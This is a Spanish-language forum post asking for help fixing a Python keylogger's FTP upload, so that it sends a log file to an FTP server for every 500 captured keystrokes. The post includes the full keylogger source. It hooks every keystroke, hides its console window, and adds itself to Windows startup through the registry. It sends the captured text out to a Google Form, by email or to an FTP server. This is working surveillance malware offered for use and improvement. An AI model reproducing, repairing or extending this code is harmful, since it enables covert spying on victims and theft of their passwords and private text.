Ejemplo, corro el script y cuando esta corriendo todo funciona bien, escribo en un notepad un texto de 1mil caractes para ver si envia los dos archivos de 500 caracteres al ftp, pero cuando lo reviso solo llegan las primeras 500 pulsaciones, he intentado con bucles while, pero la unica forma de capturar mas de 500 es cambiando el largo de las pulsaciones a 2mil o la cantidad que quiero que capture, pero lo que quiero es que el script se quede corriendo y envie archivos cada vez que capture 500 letras un archivo txt al servidor FTP.
Aqui les dejo el script para ver si lo solucionan, si logran algo porfavor avisenme!!
try: import pythoncom, pyHook except: print "Please Install pythoncom and pyHook modules" exit(0) import os import sys import threading import urllib,urllib2 import smtplib import ftplib import datetime,time import win32event, win32api, winerror from _winreg import * #Disallowing Multiple Instance mutex = win32event.CreateMutex(None, 1, 'mutex_var_xboz') if win32api.GetLastError() == winerror.ERROR_ALREADY_EXISTS: mutex = None print "Multiple Instance not Allowed" exit(0) x='' data='' count=0 #Hide Console def hide(): import win32console,win32gui window = win32console.GetConsoleWindow() win32gui.ShowWindow(window,0) return True def msg(): print """\n \n usage:python keylogger mode [optional:startup] mode: local: store the logs in a file [keylogs.txt] remote: send the logs to a Google Form. You must specify the Form URL and Field Name in the script. email: send the logs to an email. You must specify (SERVER,PORT,USERNAME,PASSWORD,TO). ftp: upload logs file to an FTP account. You must specify (SERVER,USERNAME,PASSWORD,SSL OPTION,OUTPUT DIRECTORY). [optional] startup: This will add the keylogger to windows startup.\n\n""" return True # Add to startup def addStartup(): fp=os.path.dirname(os.path.realpath(__file__)) file_name=sys.argv[0].split("\\")[-1] new_file_path=fp+"\\"+file_name keyVal= r'Software\Microsoft\Windows\CurrentVersion\Run' key2change= OpenKey(HKEY_CURRENT_USER, keyVal,0,KEY_ALL_ACCESS) SetValueEx(key2change, "Xenotix Keylogger",0,REG_SZ, new_file_path) #Local Keylogger def local(): global data if len(data)>100: fp=open("keylogs.txt","a") fp.write(data) fp.close() data='' return True #Remote Google Form logs post def remote(): global data if len(data)>100: url="https://docs.google.com/forms/d/xxxxxxxxxxxxxxxxxxxxxxxxxxxxx" #Specify Google Form URL here klog={'entry.xxxxxxxxxxx':data} #Specify the Field Name here try: dataenc=urllib.urlencode(klog) req=urllib2.Request(url,dataenc) response=urllib2.urlopen(req) data='' except Exception as e: print e return True #Email Logs class TimerClass(threading.Thread): def __init__(self): threading.Thread.__init__(self) self.event = threading.Event() def run(self): while not self.event.is_set(): global data if len(data)>100: ts = datetime.datetime.now() SERVER = "smtp.gmail.com" #Specify Server Here PORT = 587 #Specify Port Here USER="your_email@gmail.com"#Specify Username Here PASS="password_here"#Specify Password Here FROM = USER#From address is taken from username TO = ["to_address@gmail.com"] #Specify to address.Use comma if more than one to address is needed. SUBJECT = "Keylogger data: "+str(ts) MESSAGE = data message = """\ From: %s To: %s Subject: %s %s """ % (FROM, ", ".join(TO), SUBJECT, MESSAGE) try: server = smtplib.SMTP() server.connect(SERVER,PORT) server.starttls() server.login(USER,PASS) server.sendmail(FROM, TO, message) data='' server.quit() except Exception as e: print e self.event.wait(120) #Upload logs to FTP account def ftp(): global data,count if len(data)>500: count+=1 FILENAME="logs-"+str(count)+".txt" fp=open(FILENAME,"a") fp.write(data) fp.close() data='' try: SERVER="ftp.xxxxxx.com" #Specify your FTP Server address USERNAME="ftp_username" #Specify your FTP Username PASSWORD="ftp_password" #Specify your FTP Password SSL=0 #Set 1 for SSL and 0 for normal connection OUTPUT_DIR="/" #Specify output directory here if SSL==0: ft=ftplib.FTP(SERVER,USERNAME,PASSWORD) elif SSL==1: ft=ftplib.FTP_TLS(SERVER,USERNAME,PASSWORD) ft.cwd(OUTPUT_DIR) fp=open(FILENAME,'rb') cmd= 'STOR' +' '+FILENAME ft.storbinary(cmd,fp) ft.quit() fp.close() os.remove(FILENAME) except Exception as e: print e return True def main(): global x if len(sys.argv)==1: msg() exit(0) else: if len(sys.argv)>2: if sys.argv[2]=="startup": addStartup() else: msg() exit(0) if sys.argv[1]=="local": x=1 hide() elif sys.argv[1]=="remote": x=2 hide() elif sys.argv[1]=="email": hide() email=TimerClass() email.start() elif sys.argv[1]=="ftp": x=4 hide() else: msg() exit(0) return True if __name__ == '__main__': main() def keypressed(event): global x,data if event.Ascii==13: keys='<ENTER>' elif event.Ascii==8: keys='<BACK SPACE>' elif event.Ascii==9: keys='<TAB>' else: keys=chr(event.Ascii) data=data+keys if x==1: local() elif x==2: remote() elif x==4: ftp() obj = pyHook.HookManager() obj.KeyDown = keypressed obj.HookKeyboard() pythoncom.PumpMessages()]
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